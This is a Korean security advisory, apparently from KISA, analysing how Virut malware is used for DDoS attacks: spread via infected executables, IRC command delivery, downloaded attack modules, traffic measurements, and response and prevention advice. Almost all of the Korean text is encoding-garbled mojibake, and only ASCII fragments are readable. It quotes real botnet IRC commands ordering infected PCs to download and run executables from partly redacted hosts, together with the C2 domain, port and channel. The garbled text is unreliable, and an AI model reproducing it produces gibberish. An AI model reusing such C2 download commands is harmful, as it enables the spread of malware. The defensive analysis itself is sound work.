Virut ¾Ç¼ºÄڵ带 ÀÌ¿ëÇÑ DDoS °ø°Ý±â¹ý ºÐ¼®
1. °³ ¿ä
ÃÖ±Ù ±¹³»ÀÇ ¸î¸î
ÀÎÅͳݻç¿ë PC°¡ ºÐ»ê¼ºñ½º °ø°ÝÀ» À§ÇÑ Agent·Î ¾Ç¿ëµÇ¾î ÀϺΠ³×Æ®¿öÅ©¿¡¼ ¾Ç¼º Æ®·¡ÇÈÀÌ ¹ß»ýÇÏ¿´´Ù. »ç°í ºÐ¼®°á°ú, Virut ¾Ç¼ºÄڵ忡
°¨¿°µÇ¾î ÀÖ´Â PC¿¡ IRC¼¹ö¸¦ ÅëÇÏ¿© ¸í·ÉÀ» Àü´Þ, Ãß°¡ °ø°ÝÄڵ带 ´Ù¿î·Îµå․½ÇÇàÇÏ´Â ¹æ¹ýÀ¸·Î ¼ºñ½º°ÅºÎ °ø°ÝÀ» ¼öÇàÇÏ´Â °ÍÀ¸·Î È®ÀεǾú´Ù.
VirutÀº PC³»¿¡ ÀúÀåµÇ¾îÀÖ´Â ½ÇÇàÆÄÀϵ鿡 ÀÚ½ÅÀ» °¨¿°½ÃÅ°´Â ¹æ½ÄÀ¸·Î È®»êµÈ´Ù. »ç¿ëÀÚ°¡ ÀÌ¹Ì °¨¿°µÈ ÆÄÀÏÀ» USBÀúÀå ¸Åü,
³×Æ®¿öÅ© °øÀ¯Æú´õ µîÀ» ÅëÇÏ¿© Á¤»óPC¿¡¼ ½ÇÇà½ÃÅ°¸é ÇØ´çPCµµ °¨¿°µÇ°Ô µÈ´Ù. PC°¡ °¨¿°µÇ¸é ´Ù¼öÀÇ ½ÇÇàÆÄÀÏ¿¡ ¹ÙÀÌ·¯½º°¡ »ðÀÔµÇ°Ô µÇ¹Ç·Î
°¨¿°ÀÌ ÀÇ½ÉµÉ °æ¿ì, ¹é½ÅÀ» ÅëÇÑ Àüü ÆÄÀÏ Á¡°Ë ¹× Ä¡·á¸¦ ½Ç½ÃÇÏ´Â °ÍÀÌ ÇÊ¿äÇÏ´Ù.
2. VirutÀ» ÀÌ¿ëÇÑ
ºÐ»ê¼ºñ½º °ø°Ý±â¹ý
o °ø°Ý ÀýÂ÷
°ø°ÝÀÚ´Â VirutÀ» ÀüÆÄÇÑ µÚ ÇØ´ç ¾Ç¼ºÄڵ忡 ¿ø°Ý¸í·ÉÀ» Àü´ÞÇÏ¿©
°ø°Ý¸ðµâÀ» Ãß°¡·Î ¼³Ä¡ÇÏ´Â ¹æ¹ýÀ¸·Î DoS°ø°ÝÀ» ¼öÇàÇÑ´Ù. ¨ç Virut À¯Æ÷ ¡æ ¨è Virut¿¡°Ô DoS°ø°Ý¸ðµâ ´Ù¿î·ÎµåÇϵµ·Ï
¸í·ÉÀü´Þ(IRC¼¹öÀÌ¿ë) ¡æ ¨é °ø°Ý ¸ðµâ ´Ù¿î·Îµå ¨ê ÇÇÇØ»çÀÌÆ®·ÎÀÇ DDoS °ø°Ý
o ÀýÂ÷º° »ó¼¼
¨ç Virut À¯Æ÷¹æ¹ý °ø°ÝÀÚ´Â ÃÖÃÊ¿¡ »ç¿ëÀÚ°¡ ¸¹ÀÌ ¹æ¹®ÇÏ´Â À¥»çÀÌÆ® Àº´Ð
¶Ç´Â P2P °øÀ¯ µîÀ» ÅëÇÏ¿© VirutÀ» À¯Æ÷ÇÏ¿´À» °ÍÀ¸·Î ÃßÁ¤µÈ´Ù. VirutÀº °¨¿°µÈ PC³»ÀÇ ½ÇÇàÆÄÀϵéÀ» °¨¿°½ÃÅ°¹Ç·Î, ÃÖÃÊ À¯Æ÷
ÀÌÈÄ¿¡´Â À̵¿ÀúÀå ¸Åü ¶Ç´Â ³×Æ®¿öÅ© °øÀ¯Æú´õ µîÀ» ÅëÇÏ¿© ÀüÆĵȴÙ.
¨è VirutÀ» ÅëÇÑ DoS °ø°Ý¸ðµâ
´Ù¿î·Îµå Virut¿¡ ¸í·ÉÀ» Àü´ÞÇÏ¿© °ø°Ý¸ðµâÀ» ¼³Ä¡ÇÑ´Ù. (°ø°ÝÀÚ´Â ¸í·ÉÀü´ÞÀ» À§ÇÏ¿© IRC [proxima.[»ý·«].pl]¸¦
ÀÌ¿ë)
- ¸í·ÉÀü´Þ »çÀÌÆ® proxima.[»ý·«].pl, Æ÷Æ® TCP 65520, ä³Î
&virut - Àü´ÞµÇ´Â ¸í·É³»¿ë - :* PRIVMSG msfplhjz :!get
http://85.[»ý·«].2/~grander/adv735.exe :* PRIVMSG msfplhjz :!get
http://dl2.[»ý·«].com/~grander/dl.exe :* PRIVMSG msfplhjz :!get
http://85.[»ý·«].2/~grander/e.exe |
<
¸í·É Àü´Þ ¿¹>
¨é
VirutÀº Àü´ÞµÈ ¸í·ÉURL °æ·Î·Î Á¢¼ÓÇÏ¿© Ãß°¡ ¾Ç¼º¸ðµâÀ» ´Ù¿î·Îµå ¹× ¼³Ä¡ÇÑ´Ù. (Àü´Þ ¹ÞÀº °æ·Î Áß ¾Æ·¡ÀÇ 2°³ÀÇ URL ÆÄÀÏÀÌ DoS
°ø°Ý ¸ðµâÀÌ´Ù. Ãß°¡ adv735.exeÀÇ °æ¿ì Ãß°¡ÀûÀÎ ¾Ç¼ºÄڵ带 ´Ù¿î·Îµå ¹Þ´Â °ÍÀ¸·Î È®ÀεǾú´Ù.) ¡Ø DDoS °ü·Ã °ø°ÝÄÚµå ´Ù¿î·Îµå
°æ·Î http://dl2.[»ý·«].com/~grander/dl.exe http://85.[»ý·«].2/~grander/e.exe
dl.exe, e.exe°¡ ´Ù¿î·Îµå µÇ¸é ¡°À©µµ¿ìÆú´õ\Temp"¿¡ VRT[·£´ý].tmp ÇüÅ·ΠÀúÀå ¹× ÇÁ·Î¼¼½º·Î ·Îµù
µÈ´Ù. À©µµ¿ì ½ÃÀÛ ½Ã ÀÚµ¿½ÃÀÛÀ» Çϱâ À§ÇÑ ¼³Ä¡ ±â´ÉÀÌ ¾øÀ¸¹Ç·Î, ÀçºÎÆÃÇÏ¸é ´õ ÀÌ»ó È°µ¿ÇÏÁö ¾Ê´Â´Ù.
¨ê
ƯÁ¤»çÀÌÆ®¿¡ ´ëÇÑ ºÐ»ê¼ºñ½º °ÅºÎ°ø°Ý VRT[·£´ý].tmp°¡ ·ÎµåµÇ¸é »çÀÌÆ® http://www.[»ý·«].com¿¡ ´ëÇÑ ¼ºñ½º°ÅºÎ°ø°ÝÀÌ
½ÃÀ۵ȴÙ. °ø°ÝÆÐŶÀÇ ÇüÅ ¹× °¨¿°µÈ ´ÜÀÏPC°¡ ¹ß»ý½ÃÅ°´Â Æ®·¡ÇÈ ·®Àº ´ÙÀ½°ú °°ÀÌ °üÂûµÇ¾ú´Ù.
- DDoS °ø°Ý ÇüÅÂ
> °ø°Ý´ë»ó »çÀÌÆ® : http://www.[»ý·«].com > ÇÁ·ÎÅäÄÝ ¹× Æ÷Æ®: TCP
80, 443, UDP ·£´ýÆ÷Æ® > ÆÐŶ Size: TCP 80, 443 ¢Ñ 66
byte |
- ´ÜÀÏ °¨¿°PC¿¡¼ÀÇ Æ®·¡ÇÈ ¹ß»ý·®
°ø°ÝÆÐŶ Á¾·ù |
ÆÐŶ¹ß»ý ºóµµ /ÃÊ´ç |
ÃÊ´ç ¹ß»ý Æ®·¡ÇÈ ·® |
http (TCP80) |
23 ȸ |
1,520 byte |
https (TCP443) |
4 ȸ |
237 byte |
UDP |
9,346 ȸ |
6,049,570 byte |
ÃÑÇÕ |
9,373 ȸ |
6,051,327 byte
(48Mbps) |
3. À§Ç輺 ºÐ¼®
o Virut¿¡ ÀÇÇÏ¿© ¼³Ä¡µÇ´Â
VRT[·£´ý].tmp °ø°Ý¸ðµâÀº ´ë·®ÀÇ Æ®·¡ÇÈÀ» À¯¹ßÇÏ´Â °ÍÀ¸·Î È®ÀεǾú´Ù. ´ÜÀÏ Å×½ºÆ® PC¿¡¼ ÃÊ´ç 48MbpsÀÇ ´ë·® Æ®·¡ÇÈÀÌ
¹ß»ýÇÏ´Â °ÍÀ¸·Î °üÂû µÇ¾úÀ¸¹Ç·Î, »ç³» ³×Æ®¿ö Å©ÀÇ ¼ºñ½º ÀúÇÏ¿¡ Å« ¿µÇâÀ» ¹ÌÄ¥ ¼ö ÀÖ´Ù. o °ø°ÝÀÚ´Â ¸í·ÉÀü´ÞÀ» À§ÇÑ
proxima.[»ý·«].pl µµ¸ÞÀÎÀÇ resolving IP¸¦ ¼ö½Ã·Î º¯°æÇÑ´Ù. o È®½ÇÇÑ ¿¹¹æÀ» À§ÇÏ¿© Virut ¾Ç¼ºÄڵ忡 ´ëÇÑ
±Ùº»ÀûÀÎ Ä¡·á°¡ ¿ä±¸µÈ´Ù.
4. °¨¿°½Ã ´ëÀÀ¹æ¹ý
o Virut´Â °¨¿° PC ³»ÀÇ ¸¹Àº
½ÇÇàÆÄÀϵéÀ» °¨¿°½ÃÅ°¹Ç·Î, °¨¿°ÀÌ È®À뵃 °æ¿ì, »ç¿ëÀÚ´Â ¹é½ÅÀ¸·Î Àüü ÆÄÀϽýºÅÛ¿¡ ´ëÇÏ¿© Á¡°Ë ¹× Ä¡·áÇÏ¿©¾ß ÇÑ´Ù. o °¨¿° ½Ã ¾Ç¼º
Æ®·¡ÇÈÀÌ ¹ß»ýÇÒ ¼ö ÀÖÀ¸¹Ç·Î, ¿ÏÀüÇÑ Ä¡·á°¡ ÀÌ·ç¾îÁö±â Àü¿¡ ³×Æ®¿öÅ©·Î ºÎÅÍ °Ý¸®½ÃÅ°µµ·Ï ÇÑ´Ù.
5.
¿¹¹æ¹æ¹ý o ³×Æ®¿öÅ© ¶Ç´Â À̵¿½Ä ÀúÀå¸Åü µî (³×Æ®¿öÅ© °øÀ¯Æú´õ ÆÄÀÏ, P2P °øÀ¯ÆÄÀÏ, À̵¿½Ä
USBµî) ¿ÜºÎ·ÎºÎÅÍ Àü´ÞµÈ ÆÄÀÏÀº »ç¿ë Àü¿¡ ¹Ýµå½Ã ¹é½ÅÀ¸·Î Á¡°ËÇϵµ·Ï ÇÑ´Ù.
[ÀÚ·á: Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø(KISA)]
|
|